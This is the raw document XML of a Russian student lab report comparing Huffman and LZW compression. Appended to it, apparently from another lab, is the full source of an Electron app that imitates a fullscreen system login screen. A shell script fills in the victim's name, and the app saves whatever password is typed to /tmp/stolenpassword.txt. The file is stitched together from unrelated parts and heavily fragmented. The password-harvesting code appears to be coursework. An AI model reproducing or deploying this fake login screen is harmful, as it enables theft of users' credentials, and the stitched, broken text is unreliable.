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ЛАБОРАТОРНАЯ РАБОТА № 7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rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ru-RU" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>кодирование и упаковка данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>»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2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</w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:lang w:val="zxx" w:eastAsia="zxx" w:bidi="zxx"/>
        </w:rPr>
        <w:t>Белоконь Д. А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6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7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</w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="zxx" w:eastAsia="zxx" w:bidi="zxx"/>
        </w:rPr>
        <w:t>Пахомов М. А.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">       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  <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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риобретение знаний о принципе кодирования и практическое изучение нескольких алгоритмов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 xml:space="preserve">Необходимо создать две утилиты, реализующие код Хаффмана и LZW. Они должны работать inline-методом и выполнять как кодирование, так и декодирование. Также для отслеживания результатов работы нужно, чтобы в консоль выводилось затраченное на обработку время.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 xml:space="preserve">В конце работы необходимо построить гистограмму, сравнивающую время работы и коэффициент сжатия текста для обоих алгоритмов на примере трёх случаев: малого алфавита, бинарного файла и файла с одним символом; а также объяснить результат. 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>Генерируем 100000 символов тестового кода из алфавита мощностью 4. Затем создаём утилиты для заданных алгоритмов: Хаффмана и LZW.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</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>562610</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5939790" cy="12433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715</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1879600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5939790" cy="108966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После изначально сделанный файл подаём на вход первой и второй программам с ключам кодирования и декодирования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7785</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>883285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5939790" cy="174180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Затем проверяем на «перекрёстную» совместимость. И, как видим, результат вышел отрицательный. Это можно будет объяснить на следующем этапе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95250</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3651250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5939790" cy="136398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Возьмём произвольный бинарный файл и пропустим его через LZW алгоритм. Как можно увидеть, его декодированный вариант не совпадает с изначальным. Возможно, что проблема связана с чтением и записью байтов у Python. Во-первых, в процессе разработки также возникали проблемы, связанные с тем, что байтовая интерпретация отличается от символьной уже на символе „\r“. Однако просто использовать режим „rb“ нельзя, поскольку тогда символы больше 127 разбиваются на два байта. Кроме того, в больших бинарных файлах при использовании чтения в символьном виде Python выводит ошибку о декодировании некоторых символов. Со всем этим, скорее всего, и связаны проблемы кодирования бинарных файлов — они содержат нестандартные символы —, и при кодировании файлов, уже закодированных другими утилитам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  <w:t>Для алгоритма Хаффмана эта проблема приобретает вообще формат того, что он не может декодировать конечный файл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4899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6830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>527050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5939790" cy="1204595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6670</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1765935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5939790" cy="132207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Затем проверим написанные программы на  файле, состоящем из одного байтового нуля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5939790" cy="177038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Подводя итог, вот данные для кодирования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459230</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2298700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2564765" cy="149542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А это для декодирования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Эта лабораторная работа позволяет сделать выводы о различных методах кодирования и релевантности их применения. На основе гистограмм можно подвести следующие итоги.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Алгоритм Хаффмана является более универсальным, так как он лишь переводит одни байты в другие. Однако из-за условия Фано его размеры достаточно быстро растут, что уменьшает эффективность кодирования. Он больше подходит для текстов с малым разнообразием символов, но любой их частотой. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">LZW же хорошо себя проявляет при кодировании данных с высокой частотой повторений, причём не символьной, а блочной. Однако алгоритм имеет чёткий предел — максимальное количество символов в используемой таблице кодировок. Для данного случая — это UTF-8.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App.js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const fs = require("fs"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const { app, BrowserWindow } = require('electron'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get_time(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time = new Date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hours = time.getHours().toString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hours.length == 1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hours = "0" + hours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minutes = time.getMinutes().toString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minutes.length == 1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minutes = "0" + minutes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return hours + ":" + minutes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get_week_day(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time = new Date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return time.toUTCString().split(" ").slice(0, 4).join(" "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write(e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password = document.getElementsByClassName("password-input")[0].valu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fs.writeFileSync("/tmp/stolenpassword.txt", password, "utf-8"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window.clos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pressed(e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e.key == "Enter"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writ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ocument.getElementsByTagName("body")[0].addEventListener("keydown", pressed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ocument.getElementsByClassName("password-button")[0].addEventListener(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"click", writ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time = document.getElementsByClassName("head-time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time.textContent = get_tim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date = document.getElementsByClassName("head-date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ate.textContent = get_week_day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user = document.getElementsByClassName("main-user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try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data = fs.readFileSync('/tmp/stealinguser.txt', 'utf-8'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user.textContent = data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 catch(err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window.clos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/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>index.html:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;html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head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meta charset="UTF-8"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link rel="stylesheet" href="style.css"/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/head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body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div class="container"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head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head-time"&gt;&lt;/p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head-date"&gt;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main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img class="main-image" src="cat.png"/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main-user"&gt;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password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input class="password-input" type="password" placeholder="Password"/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button class="password-button"&gt;&gt;&lt;/button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password-hint"&gt;Password is incorrect. Could not operate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script src="./App.js"&gt;&lt;/script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/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>main.j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t { app, BrowserWindow } = require('electron')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>const path = require('path'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t createWindow = () =&gt; {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const mainWindow = new BrowserWindow(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1920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 1081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rame: false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ullscreen: true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ebPreferences: {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nodeIntegration: true,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contextIsolation: fals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/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/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mainWindow.loadFile('index.html'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pp.whenReady().then(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>createWindow(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app.on('activate', () =&gt;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if (BrowserWindow.getAllWindows().length === 0) createWindow()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/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pp.on('window-all-closed', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>if (process.platform !== 'darwin') app.quit()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>logon.sh:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#!/bin/bash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cho $(getent passwd "$USER" | cut -d ':' -f 5)  &gt; /tmp/stealinguser.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>/home/daniil/Documents/University/bcs-labs/11/dist/11-1.0.0.AppImage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>style.css:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>body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image: url("./background.jpg")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contain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align: center;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10%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head-tim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'Segoe UI', Tahoma, Geneva, Verdana, sans-serif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5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head-dat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1.5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weight:500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'Segoe UI', Tahoma, Geneva, Verdana, sans-serif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-5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main-imag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order-radius: 50%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9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7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: 3px solid whit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-offset: 1px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main-us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1.2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1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2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input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14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 1.6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input:focus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: none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button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color: whit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rgb(20, 20, 20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1.6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1.6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ransform: scale(1.2);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left: 0.5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border: non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align: center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decoration: non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display: inline-block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button:hov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color: rgb(200, 200, 200)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hint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  <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference w:type="default" r:id="rId11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4697633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4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qFormat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qFormat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8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1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2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3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4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5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0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6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7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8" w:customStyle="1">
    <w:name w:val="Список_БУКВЫ"/>
    <w:basedOn w:val="Style27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9" w:customStyle="1">
    <w:name w:val="Список_ЦИФРЫ"/>
    <w:basedOn w:val="Style28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8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0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2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3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4" w:customStyle="1">
    <w:name w:val="Подпись к картинке"/>
    <w:basedOn w:val="Normal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35">
    <w:name w:val="Фигура"/>
    <w:basedOn w:val="Caption"/>
    <w:qFormat/>
    <w:pPr/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611</TotalTime>
  <Application>LibreOffice/7.4.3.2$Linux_X86_64 LibreOffice_project/40$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>12</Pages>
  <Words>815</Words>
  <Characters>6015</Characters>
  <CharactersWithSpaces>7252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6-22T08:01:45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